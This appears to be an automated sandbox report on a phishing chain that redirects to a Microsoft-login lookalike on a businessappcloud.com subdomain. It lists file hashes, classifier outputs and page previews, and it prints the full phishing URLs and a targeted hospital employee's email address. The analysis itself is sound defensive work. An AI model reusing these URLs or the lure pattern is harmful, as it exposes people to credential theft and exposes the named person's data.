                                  Analysis Mode:stream
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal52.phis.win@21/22@42/257
                                  • Exclude process from analysis (whitelisted): svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 216.58.206.35, 64.233.184.84, 172.217.18.14, 34.104.35.123, 93.184.221.240
                                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • VT rate limit hit for: https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn
                                  InputOutput
                                  URL: https://www.google.com Model: Joe Sandbox AI
                                  {
                                      "typosquatting": false,
                                      "unusual_query_string": false,
                                      "suspicious_tld": false,
                                      "ip_in_url": false,
                                      "long_subdomain": false,
                                      "malicious_keywords": false,
                                      "encoded_characters": false,
                                      "redirection": false,
                                      "contains_email_address": false,
                                      "known_domain": true,
                                      "brand_spoofing_attempt": false,
                                      "third_party_hosting": false
                                  }
                                  URL: https://www.google.com
                                  URL: https://safetyworksolutions.com Model: Joe Sandbox AI
                                  {
                                      "typosquatting": false,
                                      "unusual_query_string": false,
                                      "suspicious_tld": false,
                                      "ip_in_url": false,
                                      "long_subdomain": false,
                                      "malicious_keywords": false,
                                      "encoded_characters": false,
                                      "redirection": false,
                                      "contains_email_address": false,
                                      "known_domain": false,
                                      "brand_spoofing_attempt": false,
                                      "third_party_hosting": false
                                  }
                                  URL: https://safetyworksolutions.com
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json
                                  {
                                    "contains_trigger_text": true,
                                    "trigger_text": "Verifying secure online environment.",
                                    "prominent_button_name": "unknown",
                                    "text_input_field_labels": "unknown",
                                    "pdf_icon_visible": false,
                                    "has_visible_captcha": false,
                                    "has_urgent_text": false,
                                    "has_visible_qrcode": false
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com Model: Joe Sandbox AI
                                  {
                                      "typosquatting": true,
                                      "unusual_query_string": false,
                                      "suspicious_tld": false,
                                      "ip_in_url": false,
                                      "long_subdomain": true,
                                      "malicious_keywords": true,
                                      "encoded_characters": false,
                                      "redirection": false,
                                      "contains_email_address": false,
                                      "known_domain": false,
                                      "brand_spoofing_attempt": true,
                                      "third_party_hosting": true
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json
                                  {
                                    "brands": [
                                      "Cloudflare"
                                    ]
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json
                                  {
                                    "contains_trigger_text": true,
                                    "trigger_text": "Verifying secure online environment.",
                                    "prominent_button_name": "unknown",
                                    "text_input_field_labels": "unknown",
                                    "pdf_icon_visible": false,
                                    "has_visible_captcha": false,
                                    "has_urgent_text": false,
                                    "has_visible_qrcode": false
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json
                                  {
                                    "brands": [
                                      "Cloudflare"
                                    ]
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json
                                  {
                                    "contains_trigger_text": true,
                                    "trigger_text": "Enter password",
                                    "prominent_button_name": "Sign in",
                                    "text_input_field_labels": [
                                      "Password"
                                    ],
                                    "pdf_icon_visible": false,
                                    "has_visible_captcha": false,
                                    "has_urgent_text": false,
                                    "has_visible_qrcode": false
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json
                                  {
                                    "brands": [
                                      "Microsoft"
                                    ]
                                  }
                                  URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.org Model: Joe Sandbox AI
                                  ```json{  "legit_domain": "microsoftonline.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with domains like 'microsoft.com' or 'microsoftonline.com'.",    "The provided URL 'loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com' contains the string 'microsoftonline', but it is embedded within a longer, suspicious domain name.",    "The domain 'businessappcloud.com' does not match the legitimate domain associated with Microsoft services.",    "The URL contains multiple concatenated words and unusual elements, which is a common tactic in phishing URLs to confuse users.",    "The presence of a password input field on a suspicious domain increases the risk of phishing."  ],  "riskscore": 9}
                                  Google indexed: False
                                  URL: loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com
                                              Brands: Microsoft
                                              Input Fields: Password
                                  URL: https://businessappcloud.com Model: Joe Sandbox AI
                                  {
                                      "typosquatting": false,
                                      "unusual_query_string": false,
                                      "suspicious_tld": false,
                                      "ip_in_url": false,
                                      "long_subdomain": false,
                                      "malicious_keywords": false,
                                      "encoded_characters": false,
                                      "redirection": false,
                                      "contains_email_address": false,
                                      "known_domain": false,
                                      "brand_spoofing_attempt": false,
                                      "third_party_hosting": false
                                  }
                                  URL: https://businessappcloud.com
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 18:38:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2673
                                  Entropy (8bit):3.982108777957442
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:A10B3B2ACADEF19E7FF213CAA520FE06
                                  SHA1:C5B004106C2F4DBB1ABDA882F0364108647D07CA
                                  SHA-256:7E0B7F67041942EE0DC28BD9CB81FDC07D41849A678CF2B6F2A2F6D4F3D635B8
                                  SHA-512:E74404B9035F725ECB7179D808D33A7AC9F62B4F49A37C69EA9BF6B70202920BB2090779FD6D040D5BEC9E0E4577D9C4A7A57F6DE582D31B4F952A5C8FB4912B
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.........7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............~......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 18:38:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2675
                                  Entropy (8bit):3.9985014903235334
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:8CD534C1558AE8120A51F4869A2AA2A5
                                  SHA1:9FA3FF66BCDF97017F4969C82247AF9887487EB2
                                  SHA-256:6BCDB94395CF3E9A42AFD709137A9BC9B04EFF80CA87A3416786B69736645D80
                                  SHA-512:0FF88F0CA2FF912C85A755B6CCBB07B828EC00D2B302B2DEA217CEE07360921219E2F241A0F62D489903D50E2B7594DB0015644824139566B86F1590BE9E4AC4
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.........7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............~......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2689
                                  Entropy (8bit):4.0050689885603825
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:74DB2AA8BAF98BB4A8E79EEA0C306AC6
                                  SHA1:58887D8CB5625A01D40259B3FE05983BE1E47033
                                  SHA-256:60D127A3589A20C8BB5511663B1B684EF1B22B826D5CB9A57D3428C1B25DA488
                                  SHA-512:FCE9C733FE84986ACA6F5634E8CEE6785C685A36391D9AC621504FB36CE3A08BC07D76052BE4B0AA0E32CE30BE15FEC5B37142001354379D11BF29E1CB679814
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............~......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 18:38:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2677
                                  Entropy (8bit):3.9969436146441493
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:D41461B0CB85E1804A0A4D5EF6458CCB
                                  SHA1:BCF835155FE52306E8A6E54CA52FCA510B270FE0
                                  SHA-256:4E2A557AB39D2C87D060BD3EFF71AF61AF5458D02AA9C5484BE50988860501AB
                                  SHA-512:C33310A3F5AF7C272CF7D1F12418954E6BA482A28D6CC6EFCB02932DDD29191B974EA2326AE1A138CA752266C498C848343DA7097CC4AC59926079C58F0F58BB
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.........7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............~......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 18:38:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2677
                                  Entropy (8bit):3.984402359607033
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5262170B5D992BAF08BFA9678E2B8EED
                                  SHA1:26DE3394304FC664E618F1494E2E18194D93E1A1
                                  SHA-256:E7F3D694E5E20608AEF00C69B762607DDB3EB1C9A7B6CB8F44F2DD9795A08157
                                  SHA-512:570F9B78160E95FC733517740B9D62E2F9031617593227CA2E9FEB0BE84E588DA72FE714594969B89A83F53461854B409E5011863C5AE816DF412A7AC8FBC45B
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,....,N...7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............~......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 18:38:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2679
                                  Entropy (8bit):3.9900097279324256
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:F7A0258213CB5C5EC02976FDF0D67609
                                  SHA1:87F73116E9BE5D63DF984A2B00D50A387CEE8C2E
                                  SHA-256:5A4FF9054F77A7548D70AAAFD4686A939117FB2F9CF1C9D31BCA8641E16DA29D
                                  SHA-512:0D5D09AA94E69E3506927BBE607C7F3210F8A73D1EDBDF1D3B5FC18CEBD1549EF2AC7B115A1105055767B8256BC2F436F84B469F01DCF2D5819E8EF77F40676E
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....ow..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............~......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text
                                  Category:downloaded
                                  Size (bytes):196
                                  Entropy (8bit):5.098952451791238
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                  SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                  SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                  SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/favicon.ico
                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with very long lines (624)
                                  Category:downloaded
                                  Size (bytes):784
                                  Entropy (8bit):5.6407717024694355
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:55F343BBE9A57A02998052908468CD2F
                                  SHA1:BEA7C5D4ED1FB26E573025EEA293037C2DAAB304
                                  SHA-256:60CA5F56CAD3B51F8BF4DD23705018D373D54C6132FF4635D85A13A361C58310
                                  SHA-512:3ACB988FAC0D67BFC0E08FC7C7FC14CA7BC6C813B02BA9A84BC64CBE3F4A2C7FA6297F55564F6888B4A05BD1323CA9C3722E75555E8BE126C3C1BA3E63571D94
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn
                                  Preview:<html lang="en"> <head> <script nonce="ZQmaxMYab9MoK-v325H22g">window.google = {};(function(){.var d=/^\s*(?!javascript:)(?:[\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;.(this||self).google.navigateTo=function(a,c,b){!/\/.*?[&?]gsc=1/.test(c.location.href)&&a!==c&&a.google?a.google.r&&(a.google.r=0,a=a.location,b=d.test(b)?b:void 0,b!==void 0&&(a.href=b),c.location.replace("about:blank")):c.location.replace(b)};}).call(this);(function(){var redirectUrl='amp/s/safetyworksolutions.com/pklxg/1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn';google.navigateTo(parent,window,redirectUrl);})();</script> <noscript> <meta content="0;url=amp/s/safetyworksolutions.com/pklxg/1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn" http-equiv="refresh"> </noscript> </head> </html>
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text
                                  Category:downloaded
                                  Size (bytes):315
                                  Entropy (8bit):5.0572271090563765
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://safetyworksolutions.com/favicon.ico
                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (32012)
                                  Category:dropped
                                  Size (bytes):69597
                                  Entropy (8bit):5.369216080582935
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:downloaded
                                  Size (bytes):32
                                  Entropy (8bit):4.390319531114783
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:EB3CE3190D8A58E048D35E620747D3A5
                                  SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                  SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                  SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmibxhIpp0AMhIFDa0JrrESEAlkuUstjs9ukBIFDUPzdjk=?alt=proto
                                  Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                  Category:dropped
                                  Size (bytes):17174
                                  Entropy (8bit):2.9129715116732746
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 56 x 3, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):61
                                  Entropy (8bit):4.014960565232003
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:CEBC727CD67786311C3B54567D4CB916
                                  SHA1:0A29A91FE5E867945AE1437B57D70DF026B512FF
                                  SHA-256:9ABF556C7C2FB938A457D14019242A2667360B80F0754FC8C95077D4B5C64A54
                                  SHA-512:17C3C9C42FF58434328CE54281C694CA4D7BA73C50AEEF57901C75F282258A9324F61B0E87DCF461CE779D2772B2A40F84D2DC33E534C3772A65C0805C2E7491
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:.PNG........IHDR...8.........IY['....IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                  Category:downloaded
                                  Size (bytes):621
                                  Entropy (8bit):7.673946009263606
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:4761405717E938D7E7400BB15715DB1E
                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
